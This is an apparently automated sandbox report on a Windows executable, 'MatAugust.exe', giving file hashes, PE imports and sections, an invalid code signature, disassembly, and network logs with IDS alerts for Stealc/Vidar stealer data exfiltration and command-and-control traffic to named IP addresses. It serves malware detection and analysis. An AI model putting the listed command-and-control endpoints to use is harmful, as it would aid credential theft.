Preview:	.gb_P{-webkit-border-radius:50%;border-radius:50%;bottom:2px;height:18px;position:absolute;right:0;width:18px}.gb_Ja{-webkit-border-radius:50%;border-radius:50%;-webkit-box-shadow:0px 1px 2px 0px rgba(60,64,67,.30),0px 1px 3px 1px rgba(60,64,67,.15);box-shadow:0px 1px 2px 0px rgba(60,64,67,.30),0px 1px 3px 1px rgba(60,64,67,.15);margin:2px}.gb_Ka{fill:#f9ab00}.gb_F .gb_Ka{fill:#fdd663}.gb_La>.gb_Ka{fill:#d93025}.gb_F .gb_La>.gb_Ka{fill:#f28b82}.gb_La>.gb_Ma{fill:white}.gb_Ma,.gb_F .gb_La>.gb_Ma{fill:#202124}.gb_Na{-webkit-clip-path:path("M16 0C24.8366 0 32 7.16344 32 16C32 16.4964 31.9774 16.9875 31.9332 17.4723C30.5166 16.5411 28.8215 16 27 16C22.0294 16 18 20.0294 18 25C18 27.4671 18.9927 29.7024 20.6004 31.3282C19.1443 31.7653 17.5996 32 16 32C7.16344 32 0 24.8366 0 16C0 7.16344 7.16344 0 16 0Z");clip-path:path("M16 0C24.8366 0 32 7.16344 32 16C32 16.4964 31.9774 16.9875 31.9332 17.4723C30.5166 16.5411 28.8215 16 27 16C22.0294 16 18 20.0294 18 25C18 27.4671 18.9927 29.7024 20.6004 3

Chrome Cache Entry: 91

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	SVG Scalable Vector Graphics image
Category:	downloaded
Size (bytes):	1660
Entropy (8bit):	4.301517070642596
Encrypted:	false
SSDEEP:	48:A/S9VU5IDhYYmMqPLmumtrYW2DyZ/jTq9J:A2VUSDhYYmM5trYFw/jmD
MD5:	554640F465EB3ED903B543DAE0A1BCAC
SHA1:	E0E6E2C8939008217EB76A3B3282CA75F3DC401A
SHA-256:	99BF4AA403643A6D41C028E5DB29C79C17CBC815B3E10CD5C6B8F90567A03E52
SHA-512:	462198E2B69F72F1DC9743D0EA5EED7974A035F24600AA1C2DE0211D978FF0795370560CBF274CCC82C8AC97DC3706C753168D4B90B0B81AE84CC922C055CFF0
Malicious:	false
URL:	https://www.gstatic.com/images/branding/googlelogo/svg/googlelogo_clr_74x24px.svg
Preview:	<svg xmlns="http://www.w3.org/2000/svg" width="74" height="24" viewBox="0 0 74 24"><path fill="#4285F4" d="M9.24 8.19v2.46h5.88c-.18 1.38-.64 2.39-1.34 3.1-.86.86-2.2 1.8-4.54 1.8-3.62 0-6.45-2.92-6.45-6.54s2.83-6.54 6.45-6.54c1.95 0 3.38.77 4.43 1.76L15.4 2.5C13.94 1.08 11.98 0 9.24 0 4.28 0 .11 4.04.11 9s4.17 9 9.13 9c2.68 0 4.7-.88 6.28-2.52 1.62-1.62 2.13-3.91 2.13-5.75 0-.57-.04-1.1-.13-1.54H9.24z"/><path fill="#EA4335" d="M25 6.19c-3.21 0-5.83 2.44-5.83 5.81 0 3.34 2.62 5.81 5.83 5.81s5.83-2.46 5.83-5.81c0-3.37-2.62-5.81-5.83-5.81zm0 9.33c-1.76 0-3.28-1.45-3.28-3.52 0-2.09 1.52-3.52 3.28-3.52s3.28 1.43 3.28 3.52c0 2.07-1.52 3.52-3.28 3.52z"/><path fill="#4285F4" d="M53.58 7.49h-.09c-.57-.68-1.67-1.3-3.06-1.3C47.53 6.19 45 8.72 45 12c0 3.26 2.53 5.81 5.43 5.81 1.39 0 2.49-.62 3.06-1.32h.09v.81c0 2.22-1.19 3.41-3.1 3.41-1.56 0-2.53-1.12-2.93-2.07l-2.22.92c.64 1.54 2.33 3.43 5.15 3.43 2.99 0 5.52-1.76 5.52-6.05V6.49h-2.42v1zm-2.93 8.03c-1.76 0-3.1-1.5-3.1-3.52 0-2.05 1.34-3.52 3.1-3

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit):	7.974719842517002
TrID:	Win32 Executable (generic) a (10002005/4) 99.96% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	MatAugust.exe
File size:	1'171'058 bytes
MD5:	39798d9bff4607f95df260ff89c564c0
SHA1:	a768d0f6bf5cbf67e17079610cd1e00f5638c66c
SHA256:	2e2f4121ad5623b152f88dd73801ca49bf7e90473d9bf6a3994e9462f4c585a4
SHA512:	135f4ae34263224036bac5552b12076f15fb8656ffca30b0919e6652bd015281ec4c8d462586d00834fd108a9488b8f56444d9991f748cb8930f1f8adca3b767
SSDEEP:	24576:m3MC8rKTajLzXTnQiz0hiX7oPpR0vBaUx4zUqwvkJRguGNvVekg7dcc9qVp3V2:cTojzhYkwYJaUVq+k7VcZgBccAV94
TLSH:	3D4523821B61350BFF760EF13AF205010EB9BA0785B0D91F7E15A9EE3D753122C6967A
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......A{.k...8...8...8.b<8...8.b,8...8...8...8...8...8..%8...8.."8...8Rich...8........PE..L...X\|.N.................n.......B...8.....

File Icon


Icon Hash:	00e0e0c0e9fafc78

Static PE Info

General

Entrypoint:	0x403883
Entrypoint Section:	.text
Digitally signed:	true
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics:	DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Time Stamp:	0x4E807C58 [Mon Sep 26 13:21:28 2011 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	5
OS Version Minor:	0
File Version Major:	5
File Version Minor:	0
Subsystem Version Major:	5
Subsystem Version Minor:	0
Import Hash:	be41bf7b8cc010b614bd36bbca606973

Authenticode Signature

Signature Valid:	false
Signature Issuer:	CN=GlobalSign GCC R45 EV CodeSigning CA 2020, O=GlobalSign nv-sa, C=BE
Signature Validation Error:	The digital signature of the object did not verify
Error Number:	-2146869232
Not Before, Not After	23/01/2024 10:24:28 12/03/2025 16:08:47
Subject Chain	E=a.tozzi@entersrl.it, CN=Enter Srl, OU=Enter Srl, O=Enter Srl, STREET=VIA CARLO ALBERTO DALLA CHIESA 18, L=Grottammare, S=Ascoli Piceno, C=IT, OID.1.3.6.1.4.1.311.60.2.1.3=IT, SERIALNUMBER=01524500442, OID.2.5.4.15=Private Organization
Version:	3
Thumbprint MD5:	D5D66EA7AE498CF896CF422DE5426590
Thumbprint SHA-1:	232E8A3F99CB8B202BE4DD8A235590F838B29038
Thumbprint SHA-256:	9B04FC852CDCBDA62D870E4112459D2A2A30586909E0E76B77AFA5DDF6FBA631
Serial:	5600D74B2CE1156218EEA30D

Entrypoint Preview

Instruction
sub esp, 000002D4h
push ebx
push ebp
push esi
push edi
push 00000020h
xor ebp, ebp
pop esi
mov dword ptr [esp+18h], ebp
mov dword ptr [esp+10h], 00409268h
mov dword ptr [esp+14h], ebp
call dword ptr [00408030h]
push 00008001h
call dword ptr [004080B4h]
push ebp
call dword ptr [004082C0h]
push 00000008h
mov dword ptr [00472EB8h], eax
call 00007FA7A4BCF7DBh
push ebp
push 000002B4h
mov dword ptr [00472DD0h], eax
lea eax, dword ptr [esp+38h]
push eax
push ebp
push 00409264h
call dword ptr [00408184h]
push 0040924Ch
push 0046ADC0h
call 00007FA7A4BCF4BDh
call dword ptr [004080B0h]
push eax
mov edi, 004C30A0h
push edi
call 00007FA7A4BCF4ABh
push ebp
call dword ptr [00408134h]
cmp word ptr [004C30A0h], 0022h
mov dword ptr [00472DD8h], eax
mov eax, edi
jne 00007FA7A4BCCDAAh
push 00000022h
pop esi
mov eax, 004C30A2h
push esi
push eax
call 00007FA7A4BCF181h
push eax
call dword ptr [00408260h]
mov esi, eax
mov dword ptr [esp+1Ch], esi
jmp 00007FA7A4BCCE33h
push 00000020h
pop ebx
cmp ax, bx
jne 00007FA7A4BCCDAAh
add esi, 02h
cmp word ptr [esi], bx

Rich Headers

Programming Language:

[ C ] VS2008 SP1 build 30729
[IMP] VS2008 SP1 build 30729
[ C ] VS2010 SP1 build 40219
[RES] VS2010 SP1 build 40219
[LNK] VS2010 SP1 build 40219

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x9b34	0xb4	.rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0xf4000	0xeae6	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x11a78a	0x36e8
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x7a000	0x964	.ndata
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x8000	0x2d0	.rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x6dae	0x6e00	00499a6f70259150109c809d6aa0e6ed	False	0.6611150568181818	data	6.508529563136936	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata	0x8000	0x2a62	0x2c00	07990aaa54c3bc638bb87a87f3fb13e3	False	0.3526278409090909	data	4.390535020989255	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data	0xb000	0x67ebc	0x200	014871d9a00f0e0c8c2a7cd25606c453	False	0.203125	data	1.4308602597540492	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.ndata	0x73000	0x81000	0x0	d41d8cd98f00b204e9800998ecf8427e	False	0	empty	0.0	IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc	0xf4000	0xeae6	0xec00	e69c2632cd45f8770d0aded85061cb4f	False	0.8807766154661016	data	7.513880388451515	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0x103000	0xf32	0x1000	d79aada9ceea0d10da54022b2961736c	False	0.599609375	data	5.5221272450052235	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
RT_ICON	0xf4250	0x8056	PNG image data, 128 x 128, 8-bit/color RGBA, non-interlaced	English	United States	1.0000608753880806
RT_ICON	0xfc2a8	0x26a6	PNG image data, 64 x 64, 8-bit/color RGBA, non-interlaced	English	United States	1.0011117849201536
RT_ICON	0xfe950	0x2668	Device independent bitmap graphic, 48 x 96 x 32, image size 9792	English	United States	0.5877746135069162
RT_ICON	0x100fb8	0x1128	Device independent bitmap graphic, 32 x 64 x 32, image size 4352	English	United States	0.6313752276867031
RT_ICON	0x1020e0	0x468	Device independent bitmap graphic, 16 x 32 x 32, image size 1088	English	United States	0.725177304964539
RT_DIALOG	0x102548	0x100	data	English	United States	0.5234375
RT_DIALOG	0x102648	0x11c	data	English	United States	0.6056338028169014
RT_DIALOG	0x102764	0x60	data	English	United States	0.7291666666666666
RT_GROUP_ICON	0x1027c4	0x4c	data	English	United States	0.7763157894736842
RT_MANIFEST	0x102810	0x2d6	XML 1.0 document, ASCII text, with very long lines (726), with no line terminators	English	United States	0.5647382920110193

Imports

DLL	Import
KERNEL32.dll	SetFileTime, CompareFileTime, SearchPathW, GetShortPathNameW, GetFullPathNameW, MoveFileW, SetCurrentDirectoryW, GetFileAttributesW, GetLastError, CreateDirectoryW, SetFileAttributesW, Sleep, GetTickCount, GetFileSize, GetModuleFileNameW, GetCurrentProcess, CopyFileW, ExitProcess, GetWindowsDirectoryW, GetTempPathW, GetCommandLineW, SetErrorMode, lstrcpynA, CloseHandle, lstrcpynW, GetDiskFreeSpaceW, GlobalUnlock, GlobalLock, CreateThread, LoadLibraryW, CreateProcessW, lstrcmpiA, CreateFileW, GetTempFileNameW, lstrcatW, GetProcAddress, LoadLibraryA, GetModuleHandleA, OpenProcess, lstrcpyW, GetVersionExW, GetSystemDirectoryW, GetVersion, lstrcpyA, RemoveDirectoryW, lstrcmpA, lstrcmpiW, lstrcmpW, ExpandEnvironmentStringsW, GlobalAlloc, WaitForSingleObject, GetExitCodeProcess, GlobalFree, GetModuleHandleW, LoadLibraryExW, FreeLibrary, WritePrivateProfileStringW, GetPrivateProfileStringW, WideCharToMultiByte, lstrlenA, MulDiv, WriteFile, ReadFile, MultiByteToWideChar, SetFilePointer, FindClose, FindNextFileW, FindFirstFileW, DeleteFileW, lstrlenW
USER32.dll	GetAsyncKeyState, IsDlgButtonChecked, ScreenToClient, GetMessagePos, CallWindowProcW, IsWindowVisible, LoadBitmapW, CloseClipboard, SetClipboardData, EmptyClipboard, OpenClipboard, TrackPopupMenu, GetWindowRect, AppendMenuW, CreatePopupMenu, GetSystemMetrics, EndDialog, EnableMenuItem, GetSystemMenu, SetClassLongW, IsWindowEnabled, SetWindowPos, DialogBoxParamW, CheckDlgButton, CreateWindowExW, SystemParametersInfoW, RegisterClassW, SetDlgItemTextW, GetDlgItemTextW, MessageBoxIndirectW, CharNextA, CharUpperW, CharPrevW, wvsprintfW, DispatchMessageW, PeekMessageW, wsprintfA, DestroyWindow, CreateDialogParamW, SetTimer, SetWindowTextW, PostQuitMessage, SetForegroundWindow, ShowWindow, wsprintfW, SendMessageTimeoutW, LoadCursorW, SetCursor, GetWindowLongW, GetSysColor, CharNextW, GetClassInfoW, ExitWindowsEx, IsWindow, GetDlgItem, SetWindowLongW, LoadImageW, GetDC, EnableWindow, InvalidateRect, SendMessageW, DefWindowProcW, BeginPaint, GetClientRect, FillRect, DrawTextW, EndPaint, FindWindowExW
GDI32.dll	SetBkColor, GetDeviceCaps, DeleteObject, CreateBrushIndirect, CreateFontIndirectW, SetBkMode, SetTextColor, SelectObject
SHELL32.dll	SHBrowseForFolderW, SHGetPathFromIDListW, SHGetFileInfoW, ShellExecuteW, SHFileOperationW, SHGetSpecialFolderLocation
ADVAPI32.dll	RegEnumKeyW, RegOpenKeyExW, RegCloseKey, RegDeleteKeyW, RegDeleteValueW, RegCreateKeyExW, RegSetValueExW, RegQueryValueExW, RegEnumValueW
COMCTL32.dll	ImageList_AddMasked, ImageList_Destroy, ImageList_Create
ole32.dll	CoTaskMemFree, OleInitialize, OleUninitialize, CoCreateInstance
VERSION.dll	GetFileVersionInfoSizeW, GetFileVersionInfoW, VerQueryValueW

Possible Origin

Language of compilation system	Country where language is spoken	Map
English	United States

Network Behavior

Suricata IDS Alerts

Timestamp	SID	Signature	Severity	Source IP	Source Port	Dest IP	Dest Port	Protocol
2024-12-31T16:57:34.305147+0100	2859378	ETPRO MALWARE Win32/Stealc/Vidar Stealer Host Details Exfil (POST) M2	1	192.168.2.4	49740	116.203.14.4	443	TCP
2024-12-31T16:57:36.950101+0100	2044247	ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config	1	116.203.14.4	443	192.168.2.4	49742	TCP
2024-12-31T16:57:38.250808+0100	2049087	ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST M1	1	192.168.2.4	49743	116.203.14.4	443	TCP
2024-12-31T16:57:38.251011+0100	2051831	ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config M1	1	116.203.14.4	443	192.168.2.4	49743	TCP

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Dec 31, 2024 16:57:30.694793940 CET	49738	443	192.168.2.4	149.154.167.99
Dec 31, 2024 16:57:30.694845915 CET	443	49738	149.154.167.99	192.168.2.4
Dec 31, 2024 16:57:30.694936991 CET	49738	443	192.168.2.4	149.154.167.99
Dec 31, 2024 16:57:30.700891018 CET	49738	443	192.168.2.4	149.154.167.99
Dec 31, 2024 16:57:30.700907946 CET	443	49738	149.154.167.99	192.168.2.4
Dec 31, 2024 16:57:31.321295977 CET	443	49738	149.154.167.99	192.168.2.4
Dec 31, 2024 16:57:31.321372986 CET	49738	443	192.168.2.4	149.154.167.99
Dec 31, 2024 16:57:31.410722971 CET	49738	443	192.168.2.4	149.154.167.99
Dec 31, 2024 16:57:31.410748005 CET	443	49738	149.154.167.99	192.168.2.4
Dec 31, 2024 16:57:31.411168098 CET	443	49738	149.154.167.99	192.168.2.4
Dec 31, 2024 16:57:31.411220074 CET	49738	443	192.168.2.4	149.154.167.99
Dec 31, 2024 16:57:31.420200109 CET	49738	443	192.168.2.4	149.154.167.99
Dec 31, 2024 16:57:31.467324972 CET	443	49738	149.154.167.99	192.168.2.4
Dec 31, 2024 16:57:31.600039005 CET	443	49738	149.154.167.99	192.168.2.4
Dec 31, 2024 16:57:31.600069046 CET	443	49738	149.154.167.99	192.168.2.4
Dec 31, 2024 16:57:31.600104094 CET	443	49738	149.154.167.99	192.168.2.4
Dec 31, 2024 16:57:31.600121021 CET	443	49738	149.154.167.99	192.168.2.4
Dec 31, 2024 16:57:31.600121975 CET	49738	443	192.168.2.4	149.154.167.99
Dec 31, 2024 16:57:31.600142002 CET	49738	443	192.168.2.4	149.154.167.99
Dec 31, 2024 16:57:31.600187063 CET	49738	443	192.168.2.4	149.154.167.99
Dec 31, 2024 16:57:31.601891041 CET	49738	443	192.168.2.4	149.154.167.99
Dec 31, 2024 16:57:31.601905107 CET	443	49738	149.154.167.99	192.168.2.4
Dec 31, 2024 16:57:31.617381096 CET	49739	443	192.168.2.4	116.203.14.4
Dec 31, 2024 16:57:31.617404938 CET	443	49739	116.203.14.4	192.168.2.4
Dec 31, 2024 16:57:31.617470980 CET	49739	443	192.168.2.4	116.203.14.4
Dec 31, 2024 16:57:31.617702007 CET	49739	443	192.168.2.4	116.203.14.4
Dec 31, 2024 16:57:31.617712975 CET	443	49739	116.203.14.4	192.168.2.4
Dec 31, 2024 16:57:32.481276989 CET	443	49739	116.203.14.4	192.168.2.4
Dec 31, 2024 16:57:32.481448889 CET	49739	443	192.168.2.4	116.203.14.4
Dec 31, 2024 16:57:32.485147953 CET	49739	443	192.168.2.4	116.203.14.4
Dec 31, 2024 16:57:32.485157013 CET	443	49739	116.203.14.4	192.168.2.4
Dec 31, 2024 16:57:32.485374928 CET	443	49739	116.203.14.4	192.168.2.4
Dec 31, 2024 16:57:32.485426903 CET	49739	443	192.168.2.4	116.203.14.4
Dec 31, 2024 16:57:32.485711098 CET	49739	443	192.168.2.4	116.203.14.4
Dec 31, 2024 16:57:32.527344942 CET	443	49739	116.203.14.4	192.168.2.4
Dec 31, 2024 16:57:32.942017078 CET	443	49739	116.203.14.4	192.168.2.4
Dec 31, 2024 16:57:32.942085981 CET	49739	443	192.168.2.4	116.203.14.4
Dec 31, 2024 16:57:32.942094088 CET	443	49739	116.203.14.4	192.168.2.4
Dec 31, 2024 16:57:32.942157984 CET	49739	443	192.168.2.4	116.203.14.4
Dec 31, 2024 16:57:32.944420099 CET	49739	443	192.168.2.4	116.203.14.4
Dec 31, 2024 16:57:32.944439888 CET	443	49739	116.203.14.4	192.168.2.4
Dec 31, 2024 16:57:32.946086884 CET	49740	443	192.168.2.4	116.203.14.4
Dec 31, 2024 16:57:32.946130991 CET	443	49740	116.203.14.4	192.168.2.4
Dec 31, 2024 16:57:32.946221113 CET	49740	443	192.168.2.4	116.203.14.4
Dec 31, 2024 16:57:32.946403027 CET	49740	443	192.168.2.4	116.203.14.4
Dec 31, 2024 16:57:32.946415901 CET	443	49740	116.203.14.4	192.168.2.4
Dec 31, 2024 16:57:33.622112036 CET	443	49740	116.203.14.4	192.168.2.4
Dec 31, 2024 16:57:33.622178078 CET	49740	443	192.168.2.4	116.203.14.4
Dec 31, 2024 16:57:33.622613907 CET	49740	443	192.168.2.4	116.203.14.4
Dec 31, 2024 16:57:33.622622013 CET	443	49740	116.203.14.4	192.168.2.4
Dec 31, 2024 16:57:33.624357939 CET	49740	443	192.168.2.4	116.203.14.4
Dec 31, 2024 16:57:33.624362946 CET	443	49740	116.203.14.4	192.168.2.4
Dec 31, 2024 16:57:34.305172920 CET	443	49740	116.203.14.4	192.168.2.4
Dec 31, 2024 16:57:34.305236101 CET	49740	443	192.168.2.4	116.203.14.4
Dec 31, 2024 16:57:34.305248022 CET	443	49740	116.203.14.4	192.168.2.4
Dec 31, 2024 16:57:34.305295944 CET	49740	443	192.168.2.4	116.203.14.4
Dec 31, 2024 16:57:34.305809975 CET	49740	443	192.168.2.4	116.203.14.4
Dec 31, 2024 16:57:34.305830956 CET	443	49740	116.203.14.4	192.168.2.4
Dec 31, 2024 16:57:34.310269117 CET	49741	443	192.168.2.4	116.203.14.4
Dec 31, 2024 16:57:34.310298920 CET	443	49741	116.203.14.4	192.168.2.4
Dec 31, 2024 16:57:34.310370922 CET	49741	443	192.168.2.4	116.203.14.4
Dec 31, 2024 16:57:34.310678959 CET	49741	443	192.168.2.4	116.203.14.4
Dec 31, 2024 16:57:34.310693979 CET	443	49741	116.203.14.4	192.168.2.4
Dec 31, 2024 16:57:34.964692116 CET	443	49741	116.203.14.4	192.168.2.4
Dec 31, 2024 16:57:34.966305017 CET	49741	443	192.168.2.4	116.203.14.4
Dec 31, 2024 16:57:34.966773033 CET	49741	443	192.168.2.4	116.203.14.4
Dec 31, 2024 16:57:34.966787100 CET	443	49741	116.203.14.4	192.168.2.4
Dec 31, 2024 16:57:34.968478918 CET	49741	443	192.168.2.4	116.203.14.4
Dec 31, 2024 16:57:34.968485117 CET	443	49741	116.203.14.4	192.168.2.4
Dec 31, 2024 16:57:35.643069983 CET	443	49741	116.203.14.4	192.168.2.4
Dec 31, 2024 16:57:35.643091917 CET	443	49741	116.203.14.4	192.168.2.4
Dec 31, 2024 16:57:35.643146038 CET	49741	443	192.168.2.4	116.203.14.4
Dec 31, 2024 16:57:35.643150091 CET	443	49741	116.203.14.4	192.168.2.4
Dec 31, 2024 16:57:35.643176079 CET	49741	443	192.168.2.4	116.203.14.4
Dec 31, 2024 16:57:35.643239021 CET	49741	443	192.168.2.4	116.203.14.4
Dec 31, 2024 16:57:35.643690109 CET	49741	443	192.168.2.4	116.203.14.4
Dec 31, 2024 16:57:35.643706083 CET	443	49741	116.203.14.4	192.168.2.4
Dec 31, 2024 16:57:35.645582914 CET	49742	443	192.168.2.4	116.203.14.4
Dec 31, 2024 16:57:35.645622969 CET	443	49742	116.203.14.4	192.168.2.4
Dec 31, 2024 16:57:35.645697117 CET	49742	443	192.168.2.4	116.203.14.4
Dec 31, 2024 16:57:35.645910025 CET	49742	443	192.168.2.4	116.203.14.4
Dec 31, 2024 16:57:35.645921946 CET	443	49742	116.203.14.4	192.168.2.4
Dec 31, 2024 16:57:36.288012981 CET	443	49742	116.203.14.4	192.168.2.4
Dec 31, 2024 16:57:36.288078070 CET	49742	443	192.168.2.4	116.203.14.4
Dec 31, 2024 16:57:36.288621902 CET	49742	443	192.168.2.4	116.203.14.4
Dec 31, 2024 16:57:36.288630009 CET	443	49742	116.203.14.4	192.168.2.4
Dec 31, 2024 16:57:36.290503025 CET	49742	443	192.168.2.4	116.203.14.4
Dec 31, 2024 16:57:36.290508032 CET	443	49742	116.203.14.4	192.168.2.4
Dec 31, 2024 16:57:36.949911118 CET	443	49742	116.203.14.4	192.168.2.4
Dec 31, 2024 16:57:36.949933052 CET	443	49742	116.203.14.4	192.168.2.4
Dec 31, 2024 16:57:36.949971914 CET	49742	443	192.168.2.4	116.203.14.4
Dec 31, 2024 16:57:36.950001001 CET	443	49742	116.203.14.4	192.168.2.4
Dec 31, 2024 16:57:36.950012922 CET	443	49742	116.203.14.4	192.168.2.4
Dec 31, 2024 16:57:36.950016022 CET	49742	443	192.168.2.4	116.203.14.4
Dec 31, 2024 16:57:36.950050116 CET	49742	443	192.168.2.4	116.203.14.4
Dec 31, 2024 16:57:36.950515032 CET	49742	443	192.168.2.4	116.203.14.4
Dec 31, 2024 16:57:36.950529099 CET	443	49742	116.203.14.4	192.168.2.4
Dec 31, 2024 16:57:36.953213930 CET	49743	443	192.168.2.4	116.203.14.4
Dec 31, 2024 16:57:36.953254938 CET	443	49743	116.203.14.4	192.168.2.4
Dec 31, 2024 16:57:36.953322887 CET	49743	443	192.168.2.4	116.203.14.4
Dec 31, 2024 16:57:36.953699112 CET	49743	443	192.168.2.4	116.203.14.4
Dec 31, 2024 16:57:36.953713894 CET	443	49743	116.203.14.4	192.168.2.4
Dec 31, 2024 16:57:37.595942974 CET	443	49743	116.203.14.4	192.168.2.4
Dec 31, 2024 16:57:37.596004963 CET	49743	443	192.168.2.4	116.203.14.4
Dec 31, 2024 16:57:37.597484112 CET	49743	443	192.168.2.4	116.203.14.4
Dec 31, 2024 16:57:37.597492933 CET	443	49743	116.203.14.4	192.168.2.4
Dec 31, 2024 16:57:37.613950014 CET	49743	443	192.168.2.4	116.203.14.4
Dec 31, 2024 16:57:37.613974094 CET	443	49743	116.203.14.4	192.168.2.4
Dec 31, 2024 16:57:38.250834942 CET	443	49743	116.203.14.4	192.168.2.4
Dec 31, 2024 16:57:38.250912905 CET	49743	443	192.168.2.4	116.203.14.4
Dec 31, 2024 16:57:38.250916004 CET	443	49743	116.203.14.4	192.168.2.4
Dec 31, 2024 16:57:38.250965118 CET	49743	443	192.168.2.4	116.203.14.4
Dec 31, 2024 16:57:38.251204014 CET	49743	443	192.168.2.4	116.203.14.4
Dec 31, 2024 16:57:38.251215935 CET	443	49743	116.203.14.4	192.168.2.4
Dec 31, 2024 16:57:38.265286922 CET	49744	443	192.168.2.4	116.203.14.4
Dec 31, 2024 16:57:38.265328884 CET	443	49744	116.203.14.4	192.168.2.4
Dec 31, 2024 16:57:38.265413046 CET	49744	443	192.168.2.4	116.203.14.4
Dec 31, 2024 16:57:38.265671968 CET	49744	443	192.168.2.4	116.203.14.4
Dec 31, 2024 16:57:38.265683889 CET	443	49744	116.203.14.4	192.168.2.4
Dec 31, 2024 16:57:38.933747053 CET	443	49744	116.203.14.4	192.168.2.4
Dec 31, 2024 16:57:38.933801889 CET	49744	443	192.168.2.4	116.203.14.4
Dec 31, 2024 16:57:38.934264898 CET	49744	443	192.168.2.4	116.203.14.4
Dec 31, 2024 16:57:38.934273958 CET	443	49744	116.203.14.4	192.168.2.4
Dec 31, 2024 16:57:38.936022043 CET	49744	443	192.168.2.4	116.203.14.4
Dec 31, 2024 16:57:38.936027050 CET	443	49744	116.203.14.4	192.168.2.4
Dec 31, 2024 16:57:38.936069965 CET	49744	443	192.168.2.4	116.203.14.4
Dec 31, 2024 16:57:38.936079979 CET	443	49744	116.203.14.4	192.168.2.4
Dec 31, 2024 16:57:39.262689114 CET	49745	443	192.168.2.4	116.203.14.4
Dec 31, 2024 16:57:39.262780905 CET	443	49745	116.203.14.4	192.168.2.4
Dec 31, 2024 16:57:39.262871981 CET	49745	443	192.168.2.4	116.203.14.4
Dec 31, 2024 16:57:39.263113022 CET	49745	443	192.168.2.4	116.203.14.4
Dec 31, 2024 16:57:39.263150930 CET	443	49745	116.203.14.4	192.168.2.4
Dec 31, 2024 16:57:39.584461927 CET	443	49744	116.203.14.4	192.168.2.4
Dec 31, 2024 16:57:39.584552050 CET	443	49744	116.203.14.4	192.168.2.4
Dec 31, 2024 16:57:39.584656000 CET	49744	443	192.168.2.4	116.203.14.4
Dec 31, 2024 16:57:39.584656000 CET	49744	443	192.168.2.4	116.203.14.4
Dec 31, 2024 16:57:39.585625887 CET	49744	443	192.168.2.4	116.203.14.4
Dec 31, 2024 16:57:39.585640907 CET	443	49744	116.203.14.4	192.168.2.4
Dec 31, 2024 16:57:39.918601990 CET	443	49745	116.203.14.4	192.168.2.4
Dec 31, 2024 16:57:39.920310974 CET	49745	443	192.168.2.4	116.203.14.4
Dec 31, 2024 16:57:39.920785904 CET	49745	443	192.168.2.4	116.203.14.4
Dec 31, 2024 16:57:39.920810938 CET	443	49745	116.203.14.4	192.168.2.4
Dec 31, 2024 16:57:39.922470093 CET	49745	443	192.168.2.4	116.203.14.4
Dec 31, 2024 16:57:39.922482967 CET	443	49745	116.203.14.4	192.168.2.4
Dec 31, 2024 16:57:40.749188900 CET	443	49745	116.203.14.4	192.168.2.4
Dec 31, 2024 16:57:40.749269962 CET	443	49745	116.203.14.4	192.168.2.4
Dec 31, 2024 16:57:40.749294996 CET	49745	443	192.168.2.4	116.203.14.4
Dec 31, 2024 16:57:40.749325991 CET	49745	443	192.168.2.4	116.203.14.4
Dec 31, 2024 16:57:40.750379086 CET	49745	443	192.168.2.4	116.203.14.4
Dec 31, 2024 16:57:40.750399113 CET	443	49745	116.203.14.4	192.168.2.4
Dec 31, 2024 16:57:42.054366112 CET	49751	443	192.168.2.4	172.217.16.196
Dec 31, 2024 16:57:42.054383993 CET	443	49751	172.217.16.196	192.168.2.4
Dec 31, 2024 16:57:42.054481030 CET	49751	443	192.168.2.4	172.217.16.196
Dec 31, 2024 16:57:42.054728985 CET	49751	443	192.168.2.4	172.217.16.196
Dec 31, 2024 16:57:42.054742098 CET	443	49751	172.217.16.196	192.168.2.4
Dec 31, 2024 16:57:42.342068911 CET	49752	443	192.168.2.4	172.217.16.196
